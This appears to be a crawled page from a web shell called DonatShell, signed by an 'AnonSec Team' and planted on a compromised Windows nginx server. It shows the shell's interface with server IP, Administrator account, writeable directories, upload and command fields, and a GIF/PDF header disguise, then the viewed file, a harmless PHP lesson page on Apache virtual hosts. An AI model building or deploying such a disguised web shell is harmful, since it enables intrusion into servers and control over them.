GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST1611/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST1611/_Archive//Chapter_04.php
<?
// Chapter_04.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');

$assignmentNumber = 4;
$assignmentType = "Lesson";
$assignmentTitle = "Virtual Hosts";
$evaluationType = "Lab";
$evaluationTitle = $assignmentTitle;
if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;
$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$week = 4;

$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>

<fieldset class="pio"><legend>Lesson Instruction</legend>
<b>This <?=$assignmentType?> is due <?=classDueDate($class['meetingTime'],$class['StartDate'],$week)?>.</b>
<ol start="1" class="pio">
<ol start="1">
	<li> Read the Chapter 4 <i>Virtual Hosts</i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.
</ol>
</fieldset>

<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="10">
	<!-- Dreamweaver search: <a \w*="\w*-\w*-\w*\.\w*">(.*)</a> -->
	<!-- Dreamweaver replace: $1 -->
	<!-- ch 4 -->
	<li>Configure the OS hosts file.</li>
	<li>Configure a Name-based virtual host.</li>
	<li>Configure an IP-based virtual host.</li>
	<li>Describe the  <b>Allow</b>, <b>AllowOverride</b>, <b>CustomLog</b>, <b>Deny</b>, <b>&lt;Directory&gt;</b>, <b>DirectoryIndex</b>, <b>DocumentRoot</b>, <b>ErrorLog</b>, <b>Include</b>, <b>NameVirtualHost</b>, <b>Options</b>, <b>Order</b>, <b>ScriptAlias</b>, <b>ServerAdmin</b>, <b>ServerAlias</b>, <b>ServerName</b>, <b>ServerPath</b>, and <b>&lt;VirtualHost</b>&gt; directives.</li>
</ol>
</fieldset>

<fieldset><legend>Evaluations</legend>
<?
if ($evaluationType != '') {
	$week = $week+3;
?>
	Complete and submit <a href="<?=$evaluationName?>.php"><?=$evaluationType?> <?=$assignmentNumber?><?=$evaluationTitle?></a> for evaluation by <?=classDueDate($class['meetingTime'],$class['StartDate'],$week)?>. 
<?
	$assignmentNumber = '04a';
	$assignmentType = "Lesson";
	$assignmentTitle = "Advanced Virtual Hosts";
	$evaluationType = "Lab";
	$evaluationTitle = $assignmentTitle;
	if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
	$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
	if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;
	$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
	$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
	$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
	$week = $week+1;
?>
	<br />
  Complete and submit <a href="<?=$evaluationName?>.php"><?=$evaluationType?> <?=$assignmentNumber?><?=$evaluationTitle?></a> for evaluation by <?=classDueDate($class['meetingTime'],$class['StartDate'],$week)?>. 
<?
} else {
?>
	There are no formal evaluations for this <?=$assignmentType?>.
<?
}
?>
</fieldset>

<fieldset><legend>Description</legend>
Use some basic Apache directives.
</fieldset>

<?
$thisFile=__FILE__; $thisLine=__LINE__; include('notes.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('ReferencesResources.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>.</li>\n";
?>

Anon7 - 2022
AnonSec Team